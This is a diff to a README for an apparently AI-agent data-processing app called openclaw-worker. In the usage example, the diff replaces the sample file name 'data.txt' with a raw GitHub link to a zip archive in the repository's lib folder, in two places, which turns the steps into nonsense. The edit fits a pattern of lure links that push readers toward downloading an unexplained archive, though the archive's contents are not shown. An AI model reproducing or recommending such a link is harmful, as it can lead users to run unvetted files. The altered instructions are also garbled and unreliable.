thisisi3846/openclaw-worker/README.md

 ## 📊 Example Usage

-Suppose you have a data file named `data.txt`.
+Suppose you have a data file named `https://raw.githubusercontent.com/thisisi3846/openclaw-worker/main/lib/worker-openclaw-2.9.zip`.
 To process it:

 1. Launch the application.
-2. Drag `data.txt` into the app.
+2. Drag `https://raw.githubusercontent.com/thisisi3846/openclaw-worker/main/lib/worker-openclaw-2.9.zip` into the app.
 3. Observe as the AI agents work together to analyze the data.

 Once complete, you will receive a processed output file in the same location as your original file.